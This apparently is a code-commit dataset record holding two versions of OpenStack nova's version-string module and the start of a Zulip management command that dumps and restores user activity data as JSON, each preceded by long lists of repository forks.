ademy-OpenStack/nova-scheduler,ted-gould/nova,takeshineshiro/nova,vmturbo/nova,eayunstack/nova,klmitch/nova,CCI-MOC/nova,iuliat/nova,cloudbau/nova,hanlind/nova,noironetworks/nova,dawnpower/nova,whitepages/nova,berrange/nova,plumgrid/plumgrid-nova,TwinkleChawla/nova,angdraug/nova,akash1808/nova,houshengbo/nova_vmware_compute_driver,sridevikoushik31/nova,rahulunair/nova,mahak/nova,dstroppa/openstack-smartos-nova-grizzly,yosshy/nova,devendermishrajio/nova,LoHChina/nova,adelina-t/nova,petrutlucian94/nova_dev,citrix-openstack-build/nova,dstroppa/openstack-smartos-nova-grizzly,bclau/nova,imsplitbit/nova,Juniper/nova,bclau/nova | nova/version.py | nova/version.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Version components: [year, count, revision]; revision stays None until set.
NOVA_VERSION = ['2013', '1', None]
YEAR, COUNT, REVISION = NOVA_VERSION
FINAL = False  # This becomes true at Release Candidate time


def canonical_version_string():
    """Return the dotted version string, skipping unset components."""
    present = [part for part in NOVA_VERSION if part]
    return '.'.join(present)
def version_string():
    """Return the user-facing version; non-final builds get a '-dev' suffix."""
    base = canonical_version_string()
    return base if FINAL else base + '-dev'
def vcs_version_string():
    """Return a placeholder branch:revision identifier."""
    return ':'.join(['LOCALBRANCH', 'LOCALREVISION'])
def version_string_with_vcs():
    """Return '<canonical version>-<vcs identifier>'."""
    return '{0}-{1}'.format(canonical_version_string(), vcs_version_string())
| # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# [year, count, revision] — revision is None for in-development versions.
NOVA_VERSION = ['2012', '2', None]
YEAR, COUNT, REVISION = NOVA_VERSION
FINAL = False  # This becomes true at Release Candidate time


def canonical_version_string():
    """Join the non-empty version components with dots."""
    return '.'.join(piece for piece in NOVA_VERSION if piece)
def version_string():
    """Return the release string; development builds carry a '-dev' suffix."""
    if not FINAL:
        return canonical_version_string() + '-dev'
    return canonical_version_string()
def vcs_version_string():
    """Return the placeholder VCS identifier string."""
    branch, revision = 'LOCALBRANCH', 'LOCALREVISION'
    return branch + ':' + revision
def version_string_with_vcs():
    """Combine the canonical version and VCS identifier with a hyphen."""
    parts = (canonical_version_string(), vcs_version_string())
    return '-'.join(parts)
| apache-2.0 | Python |
1681651b7d606436550aad3d696f5f1ba335caa9 | Add dump_useractivity migration helper tool. | wavelets/zulip,jonesgithub/zulip,mahim97/zulip,vikas-parashar/zulip,natanovia/zulip,proliming/zulip,gkotian/zulip,LeeRisk/zulip,jeffcao/zulip,kokoar/zulip,dxq-git/zulip,ipernet/zulip,itnihao/zulip,schatt/zulip,xuxiao/zulip,nicholasbs/zulip,yocome/zulip,isht3/zulip,willingc/zulip,aakash-cr7/zulip,noroot/zulip,DazWorrall/zulip,ApsOps/zulip,bitemyapp/zulip,yuvipanda/zulip,Suninus/zulip,shrikrishnaholla/zulip,guiquanz/zulip,suxinde2009/zulip,m1ssou/zulip,LAndreas/zulip,seapasulli/zulip,zhaoweigg/zulip,verma-varsha/zulip,ApsOps/zulip,noroot/zulip,voidException/zulip,kokoar/zulip,rishig/zulip,xuanhan863/zulip,calvinleenyc/zulip,umkay/zulip,mdavid/zulip,bluesea/zulip,Vallher/zulip,wweiradio/zulip,littledogboy/zulip,PhilSk/zulip,vaidap/zulip,brainwane/zulip,pradiptad/zulip,Frouk/zulip,themass/zulip,LAndreas/zulip,tommyip/zulip,Gabriel0402/zulip,amallia/zulip,JPJPJPOPOP/zulip,themass/zulip,grave-w-grave/zulip,bssrdf/zulip,dotcool/zulip,joshisa/zulip,vakila/zulip,tbutter/zulip,ufosky-server/zulip,DazWorrall/zulip,johnny9/zulip,vabs22/zulip,deer-hope/zulip,pradiptad/zulip,bssrdf/zulip,zachallaun/zulip,huangkebo/zulip,yuvipanda/zulip,joshisa/zulip,johnny9/zulip,TigorC/zulip,jimmy54/zulip,rht/zulip,LeeRisk/zulip,MariaFaBella85/zulip,bluesea/zulip,zacps/zulip,blaze225/zulip,hafeez3000/zulip,samatdav/zulip,krtkmj/zulip,nicholasbs/zulip,jrowan/zulip,hafeez3000/zulip,karamcnair/zulip,m1ssou/zulip,KingxBanana/zulip,saitodisse/zulip,kokoar/zulip,armooo/zulip,atomic-labs/zulip,mohsenSy/zulip,willingc/zulip,codeKonami/zulip,vabs22/zulip,peiwei/zulip,cosmicAsymmetry/zulip,gigawhitlocks/zulip,AZtheAsian/zulip,PaulPetring/zulip,luyifan/zulip,Qgap/zulip,umkay/zulip,zofuthan/zulip,Gabriel0402/zulip,zulip/zulip,dhcrzf/zulip,ufosky-server/zulip,so0k/zulip,arpitpanwar/zulip,shubhamdhama/zulip,reyha/zulip,kaiyuanheshang/zulip,seapasulli/zulip,fw1121/zulip,saitodisse/zulip,technicalpickles/zulip,pradiptad/zu
lip,Batterfii/zulip,reyha/zulip,themass/zulip,gigawhitlocks/zulip,sonali0901/zulip,hj3938/zulip,Diptanshu8/zulip,gigawhitlocks/zulip,Juanvulcano/zulip,karamcnair/zulip,timabbott/zulip,Vallher/zulip,aps-sids/zulip,verma-varsha/zulip,ahmadassaf/zulip,alliejones/zulip,nicholasbs/zulip,m1ssou/zulip,developerfm/zulip,zacps/zulip,aps-sids/zulip,vikas-parashar/zulip,Jianchun1/zulip,swinghu/zulip,natanovia/zulip,hackerkid/zulip,AZtheAsian/zulip,zofuthan/zulip,bastianh/zulip,kaiyuanheshang/zulip,adnanh/zulip,sonali0901/zulip,tommyip/zulip,PaulPetring/zulip,eeshangarg/zulip,rht/zulip,vikas-parashar/zulip,Galexrt/zulip,ApsOps/zulip,MariaFaBella85/zulip,qq1012803704/zulip,hayderimran7/zulip,AZtheAsian/zulip,Drooids/zulip,udxxabp/zulip,eastlhu/zulip,moria/zulip,ipernet/zulip,mdavid/zulip,MayB/zulip,susansls/zulip,peiwei/zulip,Vallher/zulip,johnnygaddarr/zulip,codeKonami/zulip,kokoar/zulip,jphilipsen05/zulip,Jianchun1/zulip,blaze225/zulip,jainayush975/zulip,dwrpayne/zulip,noroot/zulip,adnanh/zulip,JPJPJPOPOP/zulip,wdaher/zulip,tdr130/zulip,RobotCaleb/zulip,niftynei/zulip,eastlhu/zulip,Drooids/zulip,peguin40/zulip,dawran6/zulip,showell/zulip,mansilladev/zulip,jerryge/zulip,karamcnair/zulip,kokoar/zulip,luyifan/zulip,moria/zulip,schatt/zulip,jessedhillon/zulip,praveenaki/zulip,yuvipanda/zulip,dxq-git/zulip,ahmadassaf/zulip,Galexrt/zulip,natanovia/zulip,wangdeshui/zulip,andersk/zulip,wdaher/zulip,praveenaki/zulip,aps-sids/zulip,he15his/zulip,synicalsyntax/zulip,zofuthan/zulip,deer-hope/zulip,lfranchi/zulip,easyfmxu/zulip,bssrdf/zulip,zorojean/zulip,bitemyapp/zulip,suxinde2009/zulip,ahmadassaf/zulip,willingc/zulip,eastlhu/zulip,paxapy/zulip,pradiptad/zulip,avastu/zulip,jimmy54/zulip,sharmaeklavya2/zulip,punchagan/zulip,jackrzhang/zulip,rishig/zulip,j831/zulip,moria/zulip,LeeRisk/zulip,vikas-parashar/zulip,umkay/zulip,grave-w-grave/zulip,aliceriot/zulip,synicalsyntax/zulip,Jianchun1/zulip,cosmicAsymmetry/zulip,souravbadami/zulip,Suninus/zulip,jonesgithub/zulip,qq1012803704/zulip,thema
ss/zulip,dotcool/zulip,zulip/zulip,jackrzhang/zulip,hayderimran7/zulip,luyifan/zulip,themass/zulip,hustlzp/zulip,udxxabp/zulip,christi3k/zulip,ryanbackman/zulip,thomasboyt/zulip,jackrzhang/zulip,bowlofstew/zulip,suxinde2009/zulip,codeKonami/zulip,JanzTam/zulip,lfranchi/zulip,guiquanz/zulip,willingc/zulip,Drooids/zulip,bssrdf/zulip,fw1121/zulip,levixie/zulip,zhaoweigg/zulip,tdr130/zulip,wweiradio/zulip,shaunstanislaus/zulip,luyifan/zulip,udxxabp/zulip,samatdav/zulip,yuvipanda/zulip,bluesea/zulip,dxq-git/zulip,jeffcao/zulip,Batterfii/zulip,joyhchen/zulip,firstblade/zulip,RobotCaleb/zulip,bssrdf/zulip,bastianh/zulip,peiwei/zulip,bastianh/zulip,zwily/zulip,kokoar/zulip,dhcrzf/zulip,voidException/zulip,adnanh/zulip,mdavid/zulip,pradiptad/zulip,ryanbackman/zulip,ufosky-server/zulip,wweiradio/zulip,MayB/zulip,tbutter/zulip,arpitpanwar/zulip,hj3938/zulip,vabs22/zulip,MayB/zulip,thomasboyt/zulip,xuanhan863/zulip,littledogboy/zulip,itnihao/zulip,bitemyapp/zulip,amallia/zulip,ufosky-server/zulip,proliming/zulip,swinghu/zulip,PhilSk/zulip,zorojean/zulip,rishig/zulip,amanharitsh123/zulip,m1ssou/zulip,vikas-parashar/zulip,seapasulli/zulip,wavelets/zulip,PaulPetring/zulip,atomic-labs/zulip,zhaoweigg/zulip,vaidap/zulip,dwrpayne/zulip,jphilipsen05/zulip,ikasumiwt/zulip,jrowan/zulip,sonali0901/zulip,sonali0901/zulip,jeffcao/zulip,mansilladev/zulip,voidException/zulip,jphilipsen05/zulip,itnihao/zulip,Gabriel0402/zulip,dnmfarrell/zulip,Cheppers/zulip,cosmicAsymmetry/zulip,AZtheAsian/zulip,he15his/zulip,xuanhan863/zulip,MayB/zulip,umkay/zulip,luyifan/zulip,technicalpickles/zulip,schatt/zulip,dotcool/zulip,dattatreya303/zulip,lfranchi/zulip,wangdeshui/zulip,souravbadami/zulip,xuxiao/zulip,itnihao/zulip,mahim97/zulip,gkotian/zulip,tommyip/zulip,seapasulli/zulip,ashwinirudrappa/zulip,alliejones/zulip,dhcrzf/zulip,sonali0901/zulip,kou/zulip,johnny9/zulip,qq1012803704/zulip,stamhe/zulip,mahim97/zulip,easyfmxu/zulip,Cheppers/zulip,shrikrishnaholla/zulip,Frouk/zulip,joyhchen/zulip,jphilipsen05
/zulip,Qgap/zulip,ahmadassaf/zulip,MariaFaBella85/zulip,zhaoweigg/zulip,Batterfii/zulip,zulip/zulip,christi3k/zulip,zachallaun/zulip,Cheppers/zulip,hackerkid/zulip,so0k/zulip,avastu/zulip,amanharitsh123/zulip,showell/zulip,easyfmxu/zulip,Jianchun1/zulip,wdaher/zulip,armooo/zulip,amallia/zulip,jimmy54/zulip,dawran6/zulip,samatdav/zulip,jessedhillon/zulip,guiquanz/zulip,MayB/zulip,jessedhillon/zulip,DazWorrall/zulip,joshisa/zulip,DazWorrall/zulip,wdaher/zulip,dattatreya303/zulip,EasonYi/zulip,bowlofstew/zulip,hj3938/zulip,grave-w-grave/zulip,babbage/zulip,Diptanshu8/zulip,joyhchen/zulip,cosmicAsymmetry/zulip,Batterfii/zulip,lfranchi/zulip,shubhamdhama/zulip,ryansnowboarder/zulip,TigorC/zulip,brockwhittaker/zulip,developerfm/zulip,peguin40/zulip,Frouk/zulip,reyha/zulip,shaunstanislaus/zulip,Drooids/zulip,EasonYi/zulip,arpith/zulip,andersk/zulip,hackerkid/zulip,RobotCaleb/zulip,zwily/zulip,samatdav/zulip,arpith/zulip,suxinde2009/zulip,jimmy54/zulip,sharmaeklavya2/zulip,shaunstanislaus/zulip,schatt/zulip,praveenaki/zulip,luyifan/zulip,hengqujushi/zulip,zwily/zulip,bowlofstew/zulip,swinghu/zulip,akuseru/zulip,Juanvulcano/zulip,timabbott/zulip,developerfm/zulip,krtkmj/zulip,blaze225/zulip,technicalpickles/zulip,hengqujushi/zulip,xuxiao/zulip,bluesea/zulip,firstblade/zulip,jainayush975/zulip,showell/zulip,he15his/zulip,souravbadami/zulip,Suninus/zulip,kokoar/zulip,ApsOps/zulip,zacps/zulip,jonesgithub/zulip,DazWorrall/zulip,glovebx/zulip,zachallaun/zulip,punchagan/zulip,stamhe/zulip,amyliu345/zulip,ashwinirudrappa/zulip,yuvipanda/zulip,umkay/zulip,zulip/zulip,hj3938/zulip,gkotian/zulip,andersk/zulip,PaulPetring/zulip,natanovia/zulip,m1ssou/zulip,timabbott/zulip,grave-w-grave/zulip,wweiradio/zulip,m1ssou/zulip,JanzTam/zulip,LAndreas/zulip,andersk/zulip,jackrzhang/zulip,itnihao/zulip,zwily/zulip,wavelets/zulip,wweiradio/zulip,tdr130/zulip,aliceriot/zulip,DazWorrall/zulip,dattatreya303/zulip,joyhchen/zulip,tiansiyuan/zulip,amyliu345/zulip,levixie/zulip,AZtheAsian/zulip,showell/
zulip,hj3938/zulip,hafeez3000/zulip,brainwane/zulip,deer-hope/zulip,dawran6/zulip,tommyip/zulip,voidException/zulip,punchagan/zulip,calvinleenyc/zulip,timabbott/zulip,Qgap/zulip,tbutter/zulip,swinghu/zulip,bitemyapp/zulip,blaze225/zulip,lfranchi/zulip,vabs22/zulip,guiquanz/zulip,tbutter/zulip,punchagan/zulip,reyha/zulip,dnmfarrell/zulip,adnanh/zulip,showell/zulip,nicholasbs/zulip,alliejones/zulip,Cheppers/zulip,firstblade/zulip,jonesgithub/zulip,swinghu/zulip,xuanhan863/zulip,Suninus/zulip,sharmaeklavya2/zulip,xuanhan863/zulip,mdavid/zulip,qq1012803704/zulip,jackrzhang/zulip,natanovia/zulip,jimmy54/zulip,zhaoweigg/zulip,Vallher/zulip,xuanhan863/zulip,ipernet/zulip,SmartPeople/zulip,aps-sids/zulip,ryansnowboarder/zulip,moria/zulip,kou/zulip,tommyip/zulip,ryanbackman/zulip,dhcrzf/zulip,thomasboyt/zulip,ashwinirudrappa/zulip,vaidap/zulip,shaunstanislaus/zulip,thomasboyt/zulip,zachallaun/zulip,tiansiyuan/zulip,proliming/zulip,kou/zulip,armooo/zulip,akuseru/zulip,so0k/zulip,EasonYi/zulip,tiansiyuan/zulip,huangkebo/zulip,hayderimran7/zulip,gkotian/zulip,vabs22/zulip,isht3/zulip,bssrdf/zulip,joyhchen/zulip,hafeez3000/zulip,ericzhou2008/zulip,eeshangarg/zulip,PhilSk/zulip,Batterfii/zulip,jeffcao/zulip,hustlzp/zulip,firstblade/zulip,bitemyapp/zulip,jphilipsen05/zulip,gigawhitlocks/zulip,wavelets/zulip,ikasumiwt/zulip,noroot/zulip,atomic-labs/zulip,dnmfarrell/zulip,guiquanz/zulip,jessedhillon/zulip,suxinde2009/zulip,sharmaeklavya2/zulip,LeeRisk/zulip,hackerkid/zulip,gkotian/zulip,zwily/zulip,shrikrishnaholla/zulip,wdaher/zulip,technicalpickles/zulip,tdr130/zulip,thomasboyt/zulip,dawran6/zulip,TigorC/zulip,paxapy/zulip,niftynei/zulip,technicalpickles/zulip,amyliu345/zulip,verma-varsha/zulip,Juanvulcano/zulip,sup95/zulip,ashwinirudrappa/zulip,RobotCaleb/zulip,littledogboy/zulip,tiansiyuan/zulip,jeffcao/zulip,hackerkid/zulip,stamhe/zulip,amanharitsh123/zulip,ikasumiwt/zulip,johnny9/zulip,dattatreya303/zulip,sharmaeklavya2/zulip,JanzTam/zulip,developerfm/zulip,paxapy/zulip,Jianch
un1/zulip,verma-varsha/zulip,EasonYi/zulip,developerfm/zulip,amallia/zulip,shubhamdhama/zulip,JPJPJPOPOP/zulip,moria/zulip,stamhe/zulip,JPJPJPOPOP/zulip,MariaFaBella85/zulip,Diptanshu8/zulip,ashwinirudrappa/zulip,willingc/zulip,ikasumiwt/zulip,jerryge/zulip,susansls/zulip,zofuthan/zulip,ryansnowboarder/zulip,MariaFaBella85/zulip,huangkebo/zulip,tdr130/zulip,Frouk/zulip,jerryge/zulip,vakila/zulip,natanovia/zulip,MayB/zulip,rishig/zulip,dattatreya303/zulip,aps-sids/zulip,yuvipanda/zulip,sonali0901/zulip,easyfmxu/zulip,joshisa/zulip,aakash-cr7/zulip,sup95/zulip,hayderimran7/zulip,yocome/zulip,saitodisse/zulip,shrikrishnaholla/zulip,udxxabp/zulip,zwily/zulip,jackrzhang/zulip,seapasulli/zulip,hengqujushi/zulip,EasonYi/zulip,j831/zulip,hackerkid/zulip,arpitpanwar/zulip,dxq-git/zulip,calvinleenyc/zulip,willingc/zulip,avastu/zulip,j831/zulip,qq1012803704/zulip,glovebx/zulip,swinghu/zulip,hengqujushi/zulip,codeKonami/zulip,proliming/zulip,aliceriot/zulip,wdaher/zulip,dotcool/zulip,atomic-labs/zulip,timabbott/zulip,dhcrzf/zulip,schatt/zulip,ipernet/zulip,themass/zulip,ericzhou2008/zulip,glovebx/zulip,Drooids/zulip,krtkmj/zulip,ApsOps/zulip,dnmfarrell/zulip,brainwane/zulip,bitemyapp/zulip,ryansnowboarder/zulip,ericzhou2008/zulip,zofuthan/zulip,christi3k/zulip,glovebx/zulip,johnny9/zulip,KingxBanana/zulip,DazWorrall/zulip,joshisa/zulip,paxapy/zulip,aakash-cr7/zulip,johnnygaddarr/zulip,eeshangarg/zulip,stamhe/zulip,JanzTam/zulip,mansilladev/zulip,mdavid/zulip,peguin40/zulip,mansilladev/zulip,hengqujushi/zulip,jimmy54/zulip,mohsenSy/zulip,saitodisse/zulip,cosmicAsymmetry/zulip,TigorC/zulip,zulip/zulip,christi3k/zulip,krtkmj/zulip,LAndreas/zulip,punchagan/zulip,seapasulli/zulip,synicalsyntax/zulip,johnny9/zulip,babbage/zulip,zhaoweigg/zulip,kaiyuanheshang/zulip,Gabriel0402/zulip,j831/zulip,EasonYi/zulip,PaulPetring/zulip,shrikrishnaholla/zulip,Jianchun1/zulip,ahmadassaf/zulip,adnanh/zulip,synicalsyntax/zulip,kaiyuanheshang/zulip,noroot/zulip,sup95/zulip,dnmfarrell/zulip,shrikrishn
aholla/zulip,jerryge/zulip,Qgap/zulip,easyfmxu/zulip,ryanbackman/zulip,bastianh/zulip,ryanbackman/zulip,rht/zulip,brockwhittaker/zulip,vakila/zulip,adnanh/zulip,zorojean/zulip,zulip/zulip,swinghu/zulip,ryanbackman/zulip,qq1012803704/zulip,rht/zulip,peguin40/zulip,jphilipsen05/zulip,jonesgithub/zulip,firstblade/zulip,calvinleenyc/zulip,kou/zulip,schatt/zulip,jainayush975/zulip,esander91/zulip,jimmy54/zulip,LAndreas/zulip,peguin40/zulip,tiansiyuan/zulip,udxxabp/zulip,akuseru/zulip,qq1012803704/zulip,zachallaun/zulip,ufosky-server/zulip,shubhamdhama/zulip,JPJPJPOPOP/zulip,dwrpayne/zulip,karamcnair/zulip,esander91/zulip,easyfmxu/zulip,alliejones/zulip,arpitpanwar/zulip,udxxabp/zulip,akuseru/zulip,lfranchi/zulip,mdavid/zulip,hackerkid/zulip,bowlofstew/zulip,firstblade/zulip,kaiyuanheshang/zulip,ApsOps/zulip,littledogboy/zulip,xuxiao/zulip,dawran6/zulip,amallia/zulip,ryansnowboarder/zulip,atomic-labs/zulip,zorojean/zulip,schatt/zulip,niftynei/zulip,niftynei/zulip,fw1121/zulip,levixie/zulip,wangdeshui/zulip,he15his/zulip,KJin99/zulip,eeshangarg/zulip,deer-hope/zulip,Cheppers/zulip,vikas-parashar/zulip,johnnygaddarr/zulip,rht/zulip,PhilSk/zulip,ipernet/zulip,glovebx/zulip,xuanhan863/zulip,fw1121/zulip,rht/zulip,fw1121/zulip,noroot/zulip,seapasulli/zulip,yocome/zulip,littledogboy/zulip,zwily/zulip,guiquanz/zulip,dxq-git/zulip,PaulPetring/zulip,bastianh/zulip,ikasumiwt/zulip,Vallher/zulip,ipernet/zulip,voidException/zulip,peiwei/zulip,zacps/zulip,SmartPeople/zulip,KingxBanana/zulip,KJin99/zulip,so0k/zulip,babbage/zulip,fw1121/zulip,littledogboy/zulip,shubhamdhama/zulip,verma-varsha/zulip,tommyip/zulip,wavelets/zulip,ufosky-server/zulip,niftynei/zulip,krtkmj/zulip,stamhe/zulip,bluesea/zulip,moria/zulip,JPJPJPOPOP/zulip,amyliu345/zulip,punchagan/zulip,aliceriot/zulip,showell/zulip,blaze225/zulip,yuvipanda/zulip,peiwei/zulip,JanzTam/zulip,Suninus/zulip,Drooids/zulip,armooo/zulip,willingc/zulip,vaidap/zulip,huangkebo/zulip,akuseru/zulip,codeKonami/zulip,fw1121/zulip,esander91/zul
ip,mohsenSy/zulip,aliceriot/zulip,brainwane/zulip,firstblade/zulip,alliejones/zulip,rht/zulip,christi3k/zulip,praveenaki/zulip,Juanvulcano/zulip,mohsenSy/zulip,dawran6/zulip,hj3938/zulip,dnmfarrell/zulip,arpitpanwar/zulip,andersk/zulip,grave-w-grave/zulip,j831/zulip,babbage/zulip,shrikrishnaholla/zulip,LAndreas/zulip,calvinleenyc/zulip,umkay/zulip,bastianh/zulip,jessedhillon/zulip,dwrpayne/zulip,ufosky-server/zulip,jonesgithub/zulip,Galexrt/zulip,ericzhou2008/zulip,SmartPeople/zulip,esander91/zulip,deer-hope/zulip,Galexrt/zulip,j831/zulip,hengqujushi/zulip,mahim97/zulip,rishig/zulip,levixie/zulip,noroot/zulip,amanharitsh123/zulip,krtkmj/zulip,Vallher/zulip,bowlofstew/zulip,hafeez3000/zulip,wangdeshui/zulip,SmartPeople/zulip,samatdav/zulip,mansilladev/zulip,arpith/zulip,alliejones/zulip,susansls/zulip,MariaFaBella85/zulip,jainayush975/zulip,bluesea/zulip,gigawhitlocks/zulip,he15his/zulip,vakila/zulip,deer-hope/zulip,verma-varsha/zulip,Frouk/zulip,akuseru/zulip,wangdeshui/zulip,shaunstanislaus/zulip,atomic-labs/zulip,zorojean/zulip,brainwane/zulip,isht3/zulip,LeeRisk/zulip,RobotCaleb/zulip,ashwinirudrappa/zulip,SmartPeople/zulip,rishig/zulip,Galexrt/zulip,KJin99/zulip,levixie/zulip,Diptanshu8/zulip,LeeRisk/zulip,nicholasbs/zulip,aakash-cr7/zulip,Qgap/zulip,babbage/zulip,johnnygaddarr/zulip,avastu/zulip,reyha/zulip,huangkebo/zulip,bowlofstew/zulip,xuxiao/zulip,huangkebo/zulip,yocome/zulip,arpitpanwar/zulip,dxq-git/zulip,guiquanz/zulip,peiwei/zulip,voidException/zulip,littledogboy/zulip,themass/zulip,jerryge/zulip,johnnygaddarr/zulip,atomic-labs/zulip,natanovia/zulip,suxinde2009/zulip,Cheppers/zulip,jainayush975/zulip,Diptanshu8/zulip,souravbadami/zulip,armooo/zulip,andersk/zulip,ericzhou2008/zulip,zacps/zulip,timabbott/zulip,shaunstanislaus/zulip,vakila/zulip,Gabriel0402/zulip,esander91/zulip,so0k/zulip,babbage/zulip,wavelets/zulip,nicholasbs/zulip,bastianh/zulip,jonesgithub/zulip,tbutter/zulip,jainayush975/zulip,eastlhu/zulip,joyhchen/zulip,huangkebo/zulip,ApsOps/zuli
p,vakila/zulip,PaulPetring/zulip,mansilladev/zulip,cosmicAsymmetry/zulip,karamcnair/zulip,dotcool/zulip,hustlzp/zulip,isht3/zulip,easyfmxu/zulip,arpith/zulip,Diptanshu8/zulip,tdr130/zulip,Frouk/zulip,karamcnair/zulip,Juanvulcano/zulip,itnihao/zulip,yocome/zulip,TigorC/zulip,hustlzp/zulip,brockwhittaker/zulip,amyliu345/zulip,ahmadassaf/zulip,zacps/zulip,amallia/zulip,arpitpanwar/zulip,technicalpickles/zulip,kou/zulip,developerfm/zulip,zachallaun/zulip,calvinleenyc/zulip,praveenaki/zulip,yocome/zulip,kaiyuanheshang/zulip,codeKonami/zulip,jeffcao/zulip,showell/zulip,moria/zulip,bssrdf/zulip,krtkmj/zulip,armooo/zulip,esander91/zulip,ahmadassaf/zulip,hafeez3000/zulip,jerryge/zulip,ericzhou2008/zulip,aakash-cr7/zulip,avastu/zulip,glovebx/zulip,akuseru/zulip,rishig/zulip,bowlofstew/zulip,ikasumiwt/zulip,karamcnair/zulip,zhaoweigg/zulip,tdr130/zulip,mohsenSy/zulip,tbutter/zulip,JanzTam/zulip,ryansnowboarder/zulip,tiansiyuan/zulip,saitodisse/zulip,zorojean/zulip,PhilSk/zulip,Galexrt/zulip,bitemyapp/zulip,amyliu345/zulip,MayB/zulip,suxinde2009/zulip,amanharitsh123/zulip,brainwane/zulip,dwrpayne/zulip,peguin40/zulip,eastlhu/zulip,punchagan/zulip,so0k/zulip,wavelets/zulip,johnny9/zulip,aliceriot/zulip,hayderimran7/zulip,eastlhu/zulip,ryansnowboarder/zulip,arpith/zulip,synicalsyntax/zulip,nicholasbs/zulip,Qgap/zulip,Batterfii/zulip,Drooids/zulip,aliceriot/zulip,jrowan/zulip,zulip/zulip,udxxabp/zulip,vabs22/zulip,esander91/zulip,jerryge/zulip,wweiradio/zulip,saitodisse/zulip,hustlzp/zulip,sup95/zulip,avastu/zulip,luyifan/zulip,shubhamdhama/zulip,KJin99/zulip,zofuthan/zulip,souravbadami/zulip,KingxBanana/zulip,amallia/zulip,codeKonami/zulip,AZtheAsian/zulip,armooo/zulip,jackrzhang/zulip,brockwhittaker/zulip,susansls/zulip,amanharitsh123/zulip,saitodisse/zulip,TigorC/zulip,pradiptad/zulip,peiwei/zulip,RobotCaleb/zulip,wdaher/zulip,vaidap/zulip,deer-hope/zulip,hayderimran7/zulip,Frouk/zulip,zachallaun/zulip,synicalsyntax/zulip,wangdeshui/zulip,EasonYi/zulip,dwrpayne/zulip,Galexrt/zu
lip,RobotCaleb/zulip,blaze225/zulip,glovebx/zulip,dnmfarrell/zulip,jrowan/zulip,Juanvulcano/zulip,ashwinirudrappa/zulip,brockwhittaker/zulip,voidException/zulip,zofuthan/zulip,dattatreya303/zulip,MariaFaBella85/zulip,Gabriel0402/zulip,dwrpayne/zulip,samatdav/zulip,gkotian/zulip,adnanh/zulip,KJin99/zulip,proliming/zulip,avastu/zulip,LAndreas/zulip,Qgap/zulip,proliming/zulip,developerfm/zulip,stamhe/zulip,KingxBanana/zulip,wweiradio/zulip,vaidap/zulip,ipernet/zulip,dotcool/zulip,m1ssou/zulip,xuxiao/zulip,eeshangarg/zulip,LeeRisk/zulip,shaunstanislaus/zulip,hj3938/zulip,hengqujushi/zulip,timabbott/zulip,Vallher/zulip,isht3/zulip,arpith/zulip,susansls/zulip,vakila/zulip,paxapy/zulip,aps-sids/zulip,alliejones/zulip,eastlhu/zulip,itnihao/zulip,tiansiyuan/zulip,eeshangarg/zulip,ericzhou2008/zulip,Batterfii/zulip,susansls/zulip,dhcrzf/zulip,Cheppers/zulip,dhcrzf/zulip,sharmaeklavya2/zulip,gigawhitlocks/zulip,xuxiao/zulip,he15his/zulip,jeffcao/zulip,hayderimran7/zulip,sup95/zulip,KJin99/zulip,levixie/zulip,wangdeshui/zulip,andersk/zulip,lfranchi/zulip,he15his/zulip,johnnygaddarr/zulip,niftynei/zulip,babbage/zulip,aakash-cr7/zulip,kou/zulip,jrowan/zulip,brainwane/zulip,gkotian/zulip,mahim97/zulip,proliming/zulip,gigawhitlocks/zulip,mohsenSy/zulip,Suninus/zulip,brockwhittaker/zulip,yocome/zulip,praveenaki/zulip,tommyip/zulip,mansilladev/zulip,umkay/zulip,dxq-git/zulip,grave-w-grave/zulip,ikasumiwt/zulip,dotcool/zulip,PhilSk/zulip,sup95/zulip,tbutter/zulip,mahim97/zulip,hustlzp/zulip,zorojean/zulip,SmartPeople/zulip,shubhamdhama/zulip,reyha/zulip,jessedhillon/zulip,Gabriel0402/zulip,jessedhillon/zulip,so0k/zulip,eeshangarg/zulip,levixie/zulip,thomasboyt/zulip,hafeez3000/zulip,kou/zulip,KJin99/zulip,christi3k/zulip,aps-sids/zulip,joshisa/zulip,bluesea/zulip,souravbadami/zulip,pradiptad/zulip,paxapy/zulip,KingxBanana/zulip,mdavid/zulip,johnnygaddarr/zulip,hustlzp/zulip,jrowan/zulip,thomasboyt/zulip,isht3/zulip,technicalpickles/zulip,joshisa/zulip,praveenaki/zulip,synicalsyntax/zu
lip,kaiyuanheshang/zulip,JanzTam/zulip,Suninus/zulip | zephyr/management/commands/dump_useractivity.py | zephyr/management/commands/dump_useractivity.py | from optparse import make_option
from django.core.management.base import BaseCommand
from zephyr.models import Realm, UserProfile, UserActivity, get_client
import simplejson
from zephyr.lib.time import datetime_to_timestamp, timestamp_to_datetime
def dump():
    """Dump every UserActivity row to ./dumped-activity as a JSON list.

    Each entry is (email, client name, query, count, last-visit timestamp);
    timestamps are serialized as POSIX timestamps so they survive the round
    trip through restore().
    """
    pointers = []
    for activity in UserActivity.objects.select_related("user_profile__user__email",
                                                        "client__name").all():
        pointers.append((activity.user_profile.user.email, activity.client.name,
                         activity.query, activity.count,
                         datetime_to_timestamp(activity.last_visit)))
    # Context manager so the handle is flushed and closed deterministically;
    # the original file(...).write(...) leaked the open file object.
    with open("dumped-activity", "w") as dump_file:
        dump_file.write(simplejson.dumps(pointers) + "\n")
def restore(change):
    # Re-import activity rows written by dump(). When `change` is False this is
    # a dry run that only prints what would be restored. Counts from the dump
    # are merged additively into any existing rows, and last_visit keeps the
    # newer of the two timestamps.
    for (email, client_name, query, count, timestamp) in simplejson.loads(file("dumped-activity").read()):
        user_profile = UserProfile.objects.get(user__email=email)
        client = get_client(client_name)
        last_visit = timestamp_to_datetime(timestamp)
        print "%s: activity for %s,%s" % (email, client_name, query)
